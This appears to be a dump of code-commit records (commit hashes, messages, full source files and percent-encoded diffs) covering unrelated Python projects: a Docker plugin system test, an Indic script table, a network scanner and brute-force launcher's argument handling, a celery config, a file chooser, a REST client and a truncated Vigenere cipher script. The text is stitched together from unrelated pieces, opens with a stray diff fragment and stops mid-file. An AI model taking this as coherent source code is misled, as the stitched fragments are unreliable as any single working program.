+ try:%0A handler = import_string(endpoint)%0A request = Request(url=url, args=query_args)%0A return handler(request, **kwargs)%0A except RequestRedirect as e:%0A return self.dispatch_url(e.new_url)%0A%0A
def
|
c00c83ad1ef24a117a682d48e15d5f0c452c77fb
|
fix test
|
system_tests/manager/test_docker_plugin.py
|
system_tests/manager/test_docker_plugin.py
|
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import os
from fabric.api import settings, run
from cloudify.workflows import local
from cosmo_tester.framework.testenv import TestCase
from cosmo_tester.framework.cfy_helper import cfy
IGNORED_LOCAL_WORKFLOW_MODULES = (
'worker_installer.tasks',
'plugin_installer.tasks'
)
class TestDockerPlugin(TestCase):
def setUp(self):
super(TestDockerPlugin, self).setUp()
self.blueprint_path = \
os.path.join(os.path.dirname(__file__),
'resources', 'blueprint.yaml')
if self.env.install_plugins:
cfy.local.install_plugins(
blueprint_path=self.blueprint_path).wait()
inputs = {
'current_ip': '0.0.0.0/0',
'external_network_name': self.env.external_network_name,
'image_id': self.env.ubuntu_trusty_image_id,
'flavor_id': self.env.small_flavor_id,
'key_name': self.docker_host_key_name,
'private_key_path': self.docker_host_key_path,
'core_branch': self.core_branch,
'plugins_branch': self.plugins_branch,
'docker_plugin_branch': self.docker_plugin_branch,
'agent_user': 'ubuntu',
'openstack_config': {
'username': self.env.keystone_username,
'password': self.env.keystone_password,
'tenant_name': self.env.keystone_tenant_name,
'auth_url': self.env.keystone_url
}
}
self.local_env = local.init_env(
self.blueprint_path, name=self._testMethodName,
inputs=inputs,
ignored_modules=IGNORED_LOCAL_WORKFLOW_MODULES)
def tearDown(self):
super(TestDockerPlugin, self).tearDown()
self.local_env.execute('uninstall', task_retries=20)
def test_plugin(self):
self.local_env.execute('install', task_retries=10)
keypair = {}
host = {}
for node in self.local_env.storage.get_nodes():
if 'docker_system_test_keypair' in node.id:
keypair = node
for node_instance in self.local_env.storage.get_node_instances():
if 'docker_system_test_floating_ip' in node_instance.node_id:
host = node_instance
if not keypair or not host:
raise Exception(
'Keypair {0} or host {0} cannot be None.'
.format(keypair, host))
fabric_env = {
'user': 'ubuntu',
'key_filename': keypair.properties['private_key_path'],
'host_string': host.runtime_properties['floating_ip_address']
}
command = 'source cloudify_system_test/bin/activate && ' \
'nosetests --with-cov --cov-report term-missing ' \
'--cov docker_system_test/docker_plugin ' \
'docker_system_test/docker_plugin/tests'
with settings(**fabric_env):
result = run(command)
self.assertIn('OK', result)
@property
def core_branch(self):
return os.environ.get('BRANCH_NAME_CORE', 'master')
@property
def plugins_branch(self):
return os.environ.get('BRANCH_NAME_PLUGINS', 'master')
@property
def docker_plugin_branch(self):
return self.plugins_branch
@property
def docker_host_key_name(self):
return 'docker_system_test_key'
@property
def docker_host_key_path(self):
return '~/.ssh/docker_system_test_key.pem'
|
Python
| 0.000002
|
@@ -1221,25 +1221,44 @@
ocal
-.
+(%0A '
install
-_
+-
plugins
-(
+',
%0A
|
5ffa9f7054f9fcced99e366cfb8ea6de4dd1a01c
|
Recognize "Sinhala" as an Indic script
|
hindkit/constants/linguistics.py
|
hindkit/constants/linguistics.py
|
INDIC_SCRIPTS = {
'devanagari': {
'abbreviation': 'dv',
'indic1 tag': 'deva',
'indic2 tag': 'dev2',
},
'bangla': {
'abbreviation': 'bn',
'indic1 tag': 'beng',
'indic2 tag': 'bng2',
'alternative name': 'Bengali',
},
'gurmukhi': {
'abbreviation': 'gr',
'indic1 tag': 'guru',
'indic2 tag': 'gur2',
},
'gujarati': {
'abbreviation': 'gj',
'indic1 tag': 'gujr',
'indic2 tag': 'gjr2',
},
'odia': {
'abbreviation': 'od',
'indic1 tag': 'orya',
'indic2 tag': 'ory2',
'alternative name': 'Oriya',
},
'tamil': {
'abbreviation': 'tm',
'indic1 tag': 'taml',
'indic2 tag': 'tml2',
},
'telugu': {
'abbreviation': 'tl',
'indic1 tag': 'telu',
'indic2 tag': 'tel2',
},
'kannada': {
'abbreviation': 'kn',
'indic1 tag': 'knda',
'indic2 tag': 'knd2',
},
'malayalam': {
'abbreviation': 'ml',
'indic1 tag': 'mlym',
'indic2 tag': 'mlm2',
},
}
|
Python
| 0.998315
|
@@ -1121,11 +1121,89 @@
,%0A %7D,
+%0A%0A 'sinhala': %7B%0A 'abbreviation': 'si',%0A 'tag': 'sinh',%0A %7D,
%0A%7D%0A
|
81fba21d0788d95c44496ca327c2df68cdf34163
|
terminate processes before exit
|
core/parse.py
|
core/parse.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
import time
import os
import datetime
import random
import string
import sys
from core.targets import analysis
from core.attack import start_attack
from core.alert import info
from core.alert import warn
from core.alert import error
from core.alert import write
from core.alert import messages
from core.log import sort_logs
from core.load_modules import load_all_modules
from core.load_modules import load_all_graphs
from core.args_loader import load_all_args
from core.args_loader import check_all_required
from core.update import _check
from core.compatible import _version_info
def load():
write('\n\n')
# load libs
from core.color import finish
# load all modules in lib/brute, lib/scan, lib/graph
module_names = load_all_modules()
graph_names = load_all_graphs()
# Parse ARGVs
try:
parser, options, startup_update_flag = load_all_args(module_names, graph_names)
except SystemExit:
finish()
sys.exit(1)
# Filling Options
check_ranges = options.check_ranges
check_subdomains = options.check_subdomains
targets = options.targets
targets_list = options.targets_list
thread_number = options.thread_number
thread_number_host = options.thread_number_host
log_in_file = options.log_in_file
scan_method = options.scan_method
exclude_method = options.exclude_method
users = options.users
users_list = options.users_list
passwds = options.passwds
passwds_list = options.passwds_list
timeout_sec = options.timeout_sec
ports = options.ports
time_sleep = options.time_sleep
language = options.language
verbose_level = options.verbose_level
show_version = options.show_version
check_update = options.check_update
proxies = options.proxies
proxies_file = options.proxies_file
retries = options.retries
graph_flag = options.graph_flag
help_menu_flag = options.help_menu_flag
ping_flag = options.ping_flag
methods_args = options.methods_args
method_args_list = options.method_args_list
# Checking Requirements
(targets, targets_list, thread_number, thread_number_host,
log_in_file, scan_method, exclude_method, users, users_list,
passwds, passwds_list, timeout_sec, ports, parser, module_names, language, verbose_level, show_version,
check_update, proxies, proxies_file, retries, graph_flag, help_menu_flag, methods_args, method_args_list) = \
check_all_required(
targets, targets_list, thread_number, thread_number_host,
log_in_file, scan_method, exclude_method, users, users_list,
passwds, passwds_list, timeout_sec, ports, parser, module_names, language, verbose_level, show_version,
check_update, proxies, proxies_file, retries, graph_flag, help_menu_flag, methods_args, method_args_list
)
info(messages(language, 0))
# check for update
if startup_update_flag is True:
__version__, __code_name__ = _version_info()
_check(__version__, __code_name__, language)
info(messages(language, 96).format(len(load_all_modules()) - 1 + len(load_all_graphs())))
suff = str(datetime.datetime.now()).replace(' ', '_').replace(':', '-') + '_' + ''.join(
random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
subs_temp = 'tmp/subs_temp_%s' % (suff)
range_temp = 'tmp/ranges_%s' % (suff)
total_targets = -1
for total_targets, _ in enumerate(
analysis(targets, check_ranges, check_subdomains, subs_temp, range_temp, log_in_file, time_sleep,
language, verbose_level, show_version, check_update, proxies, retries)):
pass
total_targets += 1
total_targets = total_targets * len(scan_method)
targets = analysis(targets, check_ranges, check_subdomains, subs_temp, range_temp, log_in_file, time_sleep,
language, verbose_level, show_version, check_update, proxies, retries)
trying = 0
for target in targets:
for sm in scan_method:
trying += 1
p = multiprocessing.Process(target=start_attack, args=(
str(target).rsplit()[0], trying, total_targets, sm, users, passwds, timeout_sec, thread_number,
ports, log_in_file, time_sleep, language, verbose_level, show_version, check_update, proxies,
retries, ping_flag, methods_args))
p.start()
while 1:
n = 0
for process in multiprocessing.active_children():
if process.is_alive() is True:
n += 1
else:
process.remove(thread)
if n >= thread_number_host:
time.sleep(0.01)
else:
break
while 1:
try:
exitflag = True
for process in multiprocessing.active_children():
if process.is_alive() is True:
exitflag = False
time.sleep(0.01)
if exitflag is True:
break
except KeyboardInterrupt:
break
info(messages(language, 42))
os.remove(subs_temp)
os.remove(range_temp)
info(messages(language, 43))
sort_logs(log_in_file, language, graph_flag)
write('\n')
info(messages(language, 44))
write('\n\n')
finish()
|
Python
| 0.000001
|
@@ -5199,16 +5199,114 @@
errupt:%0A
+ for process in multiprocessing.active_children():%0A process.terminate()%0A
|
0b7a5929208bddb9e850f10ff40f1521363283fd
|
decrease map_stats precision
|
ichnaea/map_stats.py
|
ichnaea/map_stats.py
|
import csv
from cStringIO import StringIO
from ichnaea.db import Measure
def map_stats_request(request):
session = request.database.session()
query = session.query(Measure.lat, Measure.lon)
unique = set()
for lat, lon in query:
unique.add(((lat // 10000) / 1000.0, (lon // 10000) / 1000.0))
rows = StringIO()
csvwriter = csv.writer(rows)
csvwriter.writerow(('lat', 'lon'))
for lat, lon in unique:
csvwriter.writerow((lat, lon))
return rows.getvalue()
|
Python
| 0.000007
|
@@ -265,32 +265,33 @@
d(((lat // 10000
+0
) / 1000.0, (lon
@@ -295,24 +295,25 @@
lon // 10000
+0
) / 1000.0))
|
3def5ee6b6ffbb60260130deedee65cfc0e186f0
|
add missing super() constructor in IosAccelerometer
|
plyer/platforms/ios/accelerometer.py
|
plyer/platforms/ios/accelerometer.py
|
'''
iOS accelerometer
-----------------
Taken from: https://pyobjus.readthedocs.org/en/latest/pyobjus_ios.html#accessing-accelerometer
'''
from plyer.facades import Accelerometer
from pyobjus import autoclass
class IosAccelerometer(Accelerometer):
def __init__(self):
self.bridge = autoclass('bridge').alloc().init()
self.bridge.motionManager.setAccelerometerUpdateInterval_(0.1)
def _enable(self):
self.bridge.startAccelerometer()
def _disable(self):
self.bridge.stopAccelerometer()
def _get_acceleration(self):
return (
self.bridge.ac_x,
self.bridge.ac_y,
self.bridge.ac_z)
def instance():
return IosAccelerometer()
|
Python
| 0.000001
|
@@ -262,32 +262,81 @@
__init__(self):%0A
+ super(IosAccelerometer, self).__init__()%0A
self.bri
|
2fecbb4be4ade123d51e0bd8b70b016fbf9639f0
|
fix double ast output
|
src/c2p.py
|
src/c2p.py
|
from antlr4_generated.SmallCLexer import SmallCLexer
from antlr4_generated.SmallCParser import SmallCParser
from AbstractSyntaxTree import *
from Listener import *
from ErrorHandler import *
from SymbolTable import *
from VisitorDefinitionProcessor import *
from VisitorDeclarationProcessor import *
from VisitorTypeChecker import *
from VisitorCodeGenerator import *
import argparse
import traceback
import sys
import time
import os.path
# GLOBAL VARIABLES
SAVE_AST = False
SAVE_SYMBOL_TABLE = False
PRINT_TIMINGS = False
PRINT_NOTHING = False
OUT_FILE_NAME = "out.p"
def output(text, is_timing=False):
if PRINT_NOTHING:
return
if is_timing and not PRINT_TIMINGS:
return
print(text)
def parseFile(filename):
timeNow = time.time()
input_file = FileStream(filename)
output("file read: " + str(time.time() - timeNow), is_timing=True)
# get lexer
timeNow = time.time()
lexer = SmallCLexer(input_file)
output("file lexed: " + str(time.time() - timeNow), is_timing=True)
# get list of matched tokens
timeNow = time.time()
stream = CommonTokenStream(lexer)
output("file tokenized: " + str(time.time() - timeNow), is_timing=True)
# pass tokens to the parser
parser = SmallCParser(stream)
# specify the entry point
timeNow = time.time()
programContext = parser.program() # tree with program as root
output("file parsed: " + str(time.time() - timeNow), is_timing=True)
# quit if there are any syntax errors
if parser._syntaxErrors > 0:
sys.exit(0)
return programContext
def buildAST(parseTreeRoot):
timeNow = time.time()
# create an AST an attach it to a listener so the listener can fill in the tree
abstractSyntaxTree = AbstractSyntaxTree()
walker = ParseTreeWalker()
listener = Listener(abstractSyntaxTree)
# attach the listener, walk the parse tree, and fill in the AST
walker.walk(listener, parseTreeRoot)
# output the resulting AST after the walk
output("AST built: " + str(time.time() - timeNow), is_timing=True)
output(str(abstractSyntaxTree))
if SAVE_AST:
# os.path.splitext(name) splits name into tuple: (name without extension, extension)
filename = os.path.splitext(OUT_FILE_NAME)[0] + "_AST.txt"
outfile = open(filename, 'w')
outfile.write(str(abstractSyntaxTree))
outfile.close()
return abstractSyntaxTree
def scopeCheck(abstractSyntaxTree, errorHandler, symbolTable):
timeNow = time.time()
functionFiller = VisitorDefinitionProcessor(symbolTable, errorHandler)
functionFiller.visitProgramNode(abstractSyntaxTree.root)
output("symbol table filled: " + str(time.time() - timeNow), is_timing=True)
symbolTable.traverseOn()
symbolTable.resetToRoot()
timeNow = time.time()
tableFiller = VisitorDeclarationProcessor(symbolTable, errorHandler)
tableFiller.visitProgramNode(abstractSyntaxTree.root)
output("symbol table checked: " + str(time.time() - timeNow), is_timing=True)
output(str(symbolTable))
if SAVE_SYMBOL_TABLE:
# os.path.splitext(name) splits name into tuple: (name without extension, extension)
filename = os.path.splitext(OUT_FILE_NAME)[0] + "_symbol_table.txt"
outfile = open(filename, 'w')
outfile.write(str(symbolTable))
outfile.close()
def typeCheck(abstractSyntaxTree, errorHandler):
timeNow = time.time()
typeCheck = VisitorTypeChecker(errorHandler)
typeCheck.visitProgramNode(abstractSyntaxTree.root)
output("program type checked: " + str(time.time() - timeNow), is_timing=True)
def generateCode(abstractSyntaxTree, symbolTable):
timeNow = time.time()
codeGenerator = VisitorCodeGenerator(symbolTable, OUT_FILE_NAME)
codeGenerator.visitProgramNode(abstractSyntaxTree.root)
output("code generated: " + str(time.time() - timeNow), is_timing=True)
def main(filename):
# get the root of the parse tree of the input file
parseTreeRoot = parseFile(filename)
# the errorHandler which will group all of the errors
errorHandler = ErrorHandler(filename)
try:
# create an AST an attach it to a listener so the listener can fill in the tree
abstractSyntaxTree = buildAST(parseTreeRoot)
output(str(abstractSyntaxTree))
# create a symbol table and symbol table filler, fill in the table and check if everything is declared before it is used in the c file
symbolTable = SymbolTable()
scopeCheck(abstractSyntaxTree, errorHandler, symbolTable)
# do the type checking
typeCheck(abstractSyntaxTree, errorHandler)
# generate code
symbolTable.resetToRoot()
if not errorHandler.errorCount():
generateCode(abstractSyntaxTree, symbolTable)
except Exception as e:
ex_type, ex, tb = sys.exc_info()
traceback.print_exception(ex_type, ex, tb)
if errorHandler.errorCount() or errorHandler.warningCount():
print(str(errorHandler.errorCount()) + " error" + ("s" if errorHandler.errorCount() != 1 else ""))
print(str(errorHandler.warningCount()) + " warning" + ("s" if errorHandler.warningCount() != 1 else ""))
errorHandler.printErrors()
if __name__=="__main__":
argparser = argparse.ArgumentParser(description="A C to P compiler")
argparser.add_argument("filename", help="The filename of the c program")
# saveast as per assignment constraint
argparser.add_argument("-save-ast", "--save-ast", "-saveast", "--saveast", help="Serializes the AST and saves it to {OUTFILE}_AST.txt", action="store_true", default=False)
argparser.add_argument("-save-symbol-table", "--save-symbol-table", help="Serializes the symbol table and saves it to {OUTFILE}_symbol_table.txt", action="store_true", default=False)
argparser.add_argument("-t", "--timings", help="Shows how long each step of the process takes", action="store_true", default=False)
argparser.add_argument("-q", "--quiet", help="Disables the printing of the AST and symbol table", action="store_true", default=False)
argparser.add_argument("-o", help="Specifies the output filename (preferably with .p filename extension)", default="out.p")
args = argparser.parse_args()
# set global variables
SAVE_AST = args.save_ast
SAVE_SYMBOL_TABLE = args.save_symbol_table
PRINT_TIMINGS = args.timings
PRINT_NOTHING = args.quiet
OUT_FILE_NAME = args.o
main(args.filename)
|
Python
| 0.003161
|
@@ -4363,48 +4363,8 @@
t)%0A%0A
- output(str(abstractSyntaxTree))%0A
|
b041b16c1db2da49cd4814d4165fc372bdd3903f
|
Handle absence of LinuxFileChooser backend
|
plyer/platforms/linux/filechooser.py
|
plyer/platforms/linux/filechooser.py
|
'''
Linux file chooser
------------------
'''
from plyer.facades import FileChooser
from distutils.spawn import find_executable as which
import os
import subprocess as sp
import time
class SubprocessFileChooser(object):
'''A file chooser implementation that allows using
subprocess back-ends.
Normally you only need to override _gen_cmdline, executable,
separator and successretcode.
'''
executable = ""
'''The name of the executable of the back-end.
'''
separator = "|"
'''The separator used by the back-end. Override this for automatic
splitting, or override _split_output.
'''
successretcode = 0
'''The return code which is returned when the user doesn't close the
dialog without choosing anything, or when the app doesn't crash.
'''
path = None
multiple = False
filters = []
preview = False
title = None
icon = None
show_hidden = False
def __init__(self, *args, **kwargs):
self._handle_selection = kwargs.pop(
'on_selection', self._handle_selection
)
# Simulate Kivy's behavior
for i in kwargs:
setattr(self, i, kwargs[i])
@staticmethod
def _handle_selection(selection): # pylint: disable=method-hidden
'''
Dummy placeholder for returning selection from chooser.
'''
return selection
_process = None
def _run_command(self, cmd):
self._process = sp.Popen(cmd, stdout=sp.PIPE)
while True:
ret = self._process.poll()
if ret is not None:
if ret == self.successretcode:
out = self._process.communicate()[0].strip().decode('utf8')
self.selection = self._split_output(out)
self._handle_selection(self.selection)
return self.selection
else:
return None
time.sleep(0.1)
def _split_output(self, out):
'''This methods receives the output of the back-end and turns
it into a list of paths.
'''
return out.split(self.separator)
def _gen_cmdline(self):
'''Returns the command line of the back-end, based on the current
properties. You need to override this.
'''
raise NotImplementedError()
def run(self):
return self._run_command(self._gen_cmdline())
class ZenityFileChooser(SubprocessFileChooser):
'''A FileChooser implementation using Zenity (on GNU/Linux).
Not implemented features:
* show_hidden
* preview
'''
executable = "zenity"
separator = "|"
successretcode = 0
def _gen_cmdline(self):
cmdline = [
which(self.executable),
"--file-selection",
"--confirm-overwrite"
]
if self.multiple:
cmdline += ["--multiple"]
if self.mode == "save":
cmdline += ["--save"]
elif self.mode == "dir":
cmdline += ["--directory"]
if self.path:
cmdline += ["--filename", self.path]
if self.title:
cmdline += ["--name", self.title]
if self.icon:
cmdline += ["--window-icon", self.icon]
for f in self.filters:
if type(f) == str:
cmdline += ["--file-filter", f]
else:
cmdline += [
"--file-filter",
"{name} | {flt}".format(name=f[0], flt=" ".join(f[1:]))
]
return cmdline
class KDialogFileChooser(SubprocessFileChooser):
'''A FileChooser implementation using KDialog (on GNU/Linux).
Not implemented features:
* show_hidden
* preview
'''
executable = "kdialog"
separator = "\n"
successretcode = 0
def _gen_cmdline(self):
cmdline = [which(self.executable)]
filt = []
for f in self.filters:
if type(f) == str:
filt += [f]
else:
filt += list(f[1:])
if self.mode == "dir":
cmdline += [
"--getexistingdirectory",
(self.path if self.path else os.path.expanduser("~"))
]
elif self.mode == "save":
cmdline += [
"--getopenfilename",
(self.path if self.path else os.path.expanduser("~")),
" ".join(filt)
]
else:
cmdline += [
"--getopenfilename",
(self.path if self.path else os.path.expanduser("~")),
" ".join(filt)
]
if self.multiple:
cmdline += ["--multiple", "--separate-output"]
if self.title:
cmdline += ["--title", self.title]
if self.icon:
cmdline += ["--icon", self.icon]
return cmdline
class YADFileChooser(SubprocessFileChooser):
'''A NativeFileChooser implementation using YAD (on GNU/Linux).
Not implemented features:
* show_hidden
'''
executable = "yad"
separator = "|?|"
successretcode = 0
def _gen_cmdline(self):
cmdline = [
which(self.executable),
"--file-selection",
"--confirm-overwrite",
"--geometry",
"800x600+150+150"
]
if self.multiple:
cmdline += ["--multiple", "--separator", self.separator]
if self.mode == "save":
cmdline += ["--save"]
elif self.mode == "dir":
cmdline += ["--directory"]
if self.preview:
cmdline += ["--add-preview"]
if self.path:
cmdline += ["--filename", self.path]
if self.title:
cmdline += ["--name", self.title]
if self.icon:
cmdline += ["--window-icon", self.icon]
for f in self.filters:
if type(f) == str:
cmdline += ["--file-filter", f]
else:
cmdline += [
"--file-filter",
"{name} | {flt}".format(name=f[0], flt=" ".join(f[1:]))
]
return cmdline
CHOOSERS = {
"gnome": ZenityFileChooser,
"kde": KDialogFileChooser,
"yad": YADFileChooser
}
class LinuxFileChooser(FileChooser):
'''FileChooser implementation for GNu/Linux. Accepts one additional
keyword argument, *desktop_override*, which, if set, overrides the
back-end that will be used. Set it to "gnome" for Zenity, to "kde"
for KDialog and to "yad" for YAD (Yet Another Dialog).
If set to None or not set, a default one will be picked based on
the running desktop environment and installed back-ends.
'''
desktop = None
if (str(os.environ.get("XDG_CURRENT_DESKTOP")).lower() == "kde"
and which("kdialog")):
desktop = "kde"
elif which("yad"):
desktop = "yad"
elif which("zenity"):
desktop = "gnome"
def _file_selection_dialog(self, desktop_override=desktop, **kwargs):
if not desktop_override:
desktop_override = desktop
# This means we couldn't find any back-end
if not desktop_override:
raise OSError("No back-end available. Please install one.")
chooser = CHOOSERS[desktop_override]
c = chooser(**kwargs)
return c.run()
def instance():
return LinuxFileChooser()
|
Python
| 0.000425
|
@@ -7114,16 +7114,21 @@
rride =
+self.
desktop%0A
|
a536da0d925201fc652b08ad27985f37c5bd4b6c
|
Fix relative_urls helper for call from initialization code
|
src/adhocracy/lib/helpers/site_helper.py
|
src/adhocracy/lib/helpers/site_helper.py
|
from pylons import config, app_globals as g
from pylons.i18n import _
from paste.deploy.converters import asbool
from adhocracy.model import instance_filter as ifilter
CURRENT_INSTANCE = object()
def get_domain_part(domain_with_port):
return domain_with_port.split(':')[0]
def domain():
return get_domain_part(config.get('adhocracy.domain'))
def name():
return config.get('adhocracy.site.name', _("Adhocracy"))
def relative_urls():
return asbool(config.get('adhocracy.relative_urls', 'false'))
def base_url(path='', instance=CURRENT_INSTANCE, absolute=False,
append_slash=False, config=config):
"""
Constructs an URL.
Path is expected to start with '/'. If not, a relative path to the current
object will be created.
If instance isn't defined, the current instance is assumed. Otherwise,
either an instance instance or None has to be passed.
If absolute is True, an absolute URL including the protocol part is
returned. Otherwise this is avoided, if relative_urls is set to True.
"""
if instance == CURRENT_INSTANCE:
instance = ifilter.get_instance()
if relative_urls():
if instance is None:
prefix = ''
else:
prefix = '/i/' + instance.key
if absolute:
protocol = config.get('adhocracy.protocol', 'http').strip()
domain = config.get('adhocracy.domain').strip()
result = '%s://%s%s%s' % (protocol, domain, prefix, path)
else:
result = '%s%s' % (prefix, path)
else:
protocol = config.get('adhocracy.protocol', 'http').strip()
domain = config.get('adhocracy.domain').strip()
if instance is None or g.single_instance:
subdomain = ''
else:
subdomain = '%s.' % instance.key
result = '%s://%s%s%s' % (protocol, subdomain, domain, path)
if result == '':
result = '/'
if append_slash and not result.endswith('/'):
result += '/'
return result
def shortlink_url(delegateable):
path = "/d/%s" % delegateable.id
return base_url(path, None, absolute=True)
|
Python
| 0.000006
|
@@ -444,16 +444,29 @@
ve_urls(
+config=config
):%0A r
@@ -1172,16 +1172,22 @@
ve_urls(
+config
):%0A%0A
|
3f8a29efa3128f8167306b46e47e7ac18cf592ab
|
set broker pool limit
|
celeryconfig.py
|
celeryconfig.py
|
import os
import sys
import urlparse
from kombu import Exchange, Queue
sys.path.append('.')
redis_url = os.environ.get('REDIS_URL', "redis://127.0.0.1:6379/")
if not redis_url.endswith("/"):
redis_url += "/"
BROKER_URL = redis_url + "1" # REDIS_CELERY_TASKS_DATABASE_NUMBER = 1
CELERY_RESULT_BACKEND = redis_url + "2" # REDIS_CELERY_RESULTS_DATABASE_NUMBER = 2
REDIS_CONNECT_RETRY = True
# these options will be defaults in future as per http://celery.readthedocs.org/en/latest/getting-started/brokers/redis.html
BROKER_TRANSPORT_OPTIONS = {'fanout_prefix': True,
'fanout_patterns': True,
'visibility_timeout': 60 # one minute
}
CELERY_DEFAULT_QUEUE = 'core_high'
CELERY_QUEUES = [
Queue('core_high', routing_key='core_high'),
Queue('core_low', routing_key='core_low')
]
# added because https://github.com/celery/celery/issues/896
BROKER_POOL_LIMIT = None
CELERY_CREATE_MISSING_QUEUES = True
CELERY_ACCEPT_CONTENT = ['pickle', 'json']
CELERY_ENABLE_UTC = True
CELERY_TASK_RESULT_EXPIRES = 60*60 # 1 hour
CELERY_ACKS_LATE = True
# remove this, might fix deadlocks as per https://github.com/celery/celery/issues/970
# CELERYD_MAX_TASKS_PER_CHILD = 100
CELERYD_FORCE_EXECV = True
CELERY_TRACK_STARTED = True
# https://groups.google.com/forum/#!topic/celery-users/Y_ifty2l6Fc
CELERYD_PREFETCH_MULTIPLIER=1
# List of modules to import when celery starts.
CELERY_IMPORTS = ("tasks",)
CELERY_ANNOTATIONS = {
'celery.chord_unlock': {'soft_time_limit': 60} # 1 minute
}
|
Python
| 0
|
@@ -957,12 +957,11 @@
T =
-None
+100
%0A%0ACE
|
2ffea9e4d8c802c86261cf9819657e8a38c906a9
|
return the resource after saving it
|
genericclient/__init__.py
|
genericclient/__init__.py
|
import requests
from . import exceptions
_version = "0.0.12"
__version__ = VERSION = tuple(map(int, _version.split('.')))
MultipleResourcesFound = exceptions.MultipleResourcesFound
ResourceNotFound = exceptions.ResourceNotFound
HTTPError = exceptions.HTTPError
NotAuthenticatedError = exceptions.NotAuthenticatedError
BadRequestError = exceptions.BadRequestError
def hydrate_json(response):
try:
return response.json()
except ValueError:
raise ValueError(
"Response from server is not valid JSON. Received {}: {}".format(
response.status_code,
response.text,
),
)
class Resource(object):
whitelist = (
'__class__',
'_endpoint',
'payload',
'save',
'delete',
)
def __init__(self, endpoint, **kwargs):
self._endpoint = endpoint
self.payload = kwargs
super(Resource, self).__init__()
def __setattr__(self, name, value):
if name == 'whitelist' or name in self.whitelist:
return super(Resource, self).__setattr__(name, value)
if isinstance(value, self.__class__) and hasattr(value, 'id'):
value = value.id
self.payload[name] = value
def __getattribute__(self, name):
if name == 'whitelist' or name in self.whitelist:
return super(Resource, self).__getattribute__(name)
return self.payload[name]
def save(self):
url = self._endpoint.url
if 'id' in self.payload:
url = "{}{}{}".format(url, self.payload['id'], self._endpoint.trail)
try:
response = self._endpoint.request('put', url, json=self.payload)
except exceptions.BadRequestError:
response = self._endpoint.request('patch', url, json=self.payload)
results = hydrate_json(response)
else:
response = self._endpoint.request('post', url, json=self.payload)
results = hydrate_json(response)
self.payload = results
def delete(self):
url = "{}{}{}".format(self._endpoint.url, self.payload['id'], self.endpoint.trail)
self._endpoint.request('delete', url)
def __repr__(self):
try:
pk = self.id
except AttributeError:
pk = None
return '<Resource `{0}` id: {1}>'.format(self._endpoint.name, pk)
class Endpoint(object):
def __init__(self, api, name):
self.api = api
self.name = name
self.trail = '/' if self.api.trailing_slash else ''
self.endpoint = '%s%s' % (name, self.trail)
self.url = "{}{}".format(self.api.url, self.endpoint)
super(Endpoint, self).__init__()
def filter(self, **kwargs):
response = self.request('get', self.url, params=kwargs)
results = hydrate_json(response)
return [Resource(self, **result) for result in results]
def all(self):
return self.filter()
def get(self, **kwargs):
if 'id' in kwargs:
url = "{0}{1}{2}".format(self.url, kwargs['id'], self.trail)
response = self.request('get', url)
elif 'pk' in kwargs:
url = "{0}{1}{2}".format(self.url, kwargs['pk'], self.trail)
response = self.request('get', url)
elif 'slug' in kwargs:
url = "{0}{1}{2}".format(self.url, kwargs['slug'], self.trail)
response = self.request('get', url)
elif 'username' in kwargs:
url = "{0}{1}{2}".format(self.url, kwargs['username'], self.trail)
response = self.request('get', url)
else:
url = self.url
response = self.request('get', url, params=kwargs)
if response.status_code == 404:
raise exceptions.ResourceNotFound("No `{}` found for {}".format(self.name, kwargs))
result = hydrate_json(response)
if isinstance(result, list):
if len(result) == 0:
raise exceptions.ResourceNotFound("No `{}` found for {}".format(self.name, kwargs))
if len(result) > 1:
raise exceptions.MultipleResourcesFound("Found {} `{}` for {}".format(len(result), self.name, kwargs))
return Resource(self, **result[0])
return Resource(self, **result)
def create(self, payload):
response = self.request('post', self.url, json=payload)
if response.status_code != 201:
raise exceptions.HTTPError(response)
result = hydrate_json(response)
return Resource(self, **result)
def get_or_create(self, **kwargs):
defaults = kwargs.pop('defaults', {})
try:
resource = self.get(**kwargs)
return resource
except ResourceNotFound:
params = {k: v for k, v in kwargs.items()}
params.update(defaults)
return self.create(params)
def create_or_update(self, payload):
if 'id' in payload:
return Resource(self, **payload).save()
return self.create(payload)
def delete(self, pk):
url = "{}{}{}".format(self.url, pk, self.trail)
response = self.request('delete', url)
if response.status_code != 204:
raise exceptions.HTTPError(response)
return None
def request(self, method, *args, **kwargs):
response = getattr(self.api.session, method)(*args, **kwargs)
if response.status_code == 403:
raise exceptions.NotAuthenticatedError(response, "Cannot authenticate user `{}` on the API".format(self.api.session.auth[0]))
elif response.status_code == 400:
raise exceptions.BadRequestError(
response,
"Bad Request 400: {}".format(response.text)
)
return response
def __repr__(self):
return "<Endpoint `{}`>".format(self.url)
class GenericClient(object):
endpoint_class = Endpoint
MultipleResourcesFound = MultipleResourcesFound
ResourceNotFound = ResourceNotFound
HTTPError = HTTPError
NotAuthenticatedError = NotAuthenticatedError
BadRequestError = BadRequestError
def __init__(self, url, auth=None, adapter=None, trailing_slash=False):
self.session = requests.session()
self.session.headers.update({'Content-Type': 'application/json'})
if auth is not None:
self.session.auth = auth
if not url.endswith('/'):
url = '{}/'.format(url)
self.url = url
self.trailing_slash = trailing_slash
if adapter is not None:
self.session.mount(url, adapter())
super(GenericClient, self).__init__()
def __getattribute__(self, name):
if name in ('session', 'url', 'endpoint_class', 'trailing_slash'):
return super(GenericClient, self).__getattribute__(name)
return self.endpoint_class(self, name)
|
Python
| 0.000079
|
@@ -2051,16 +2051,36 @@
results
+%0A return self
%0A%0A de
|
3abbba864df16e06a768b761baefd3d705008114
|
Update vigenereCipher: fixed typo
|
books/CrackingCodesWithPython/Chapter18/vigenereCipher.py
|
books/CrackingCodesWithPython/Chapter18/vigenereCipher.py
|
# Vigenere Cipher (Polyalphabetic Substitution Cipher)
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def main():
# This text can be downloaded from https://www.nostarch.com/crackingcodes/:
myMessage = """Alan Mathison Turing was a British mathematician, logician, cryptanalyst, and computer scientist."""
myKey = 'ASIMOV'
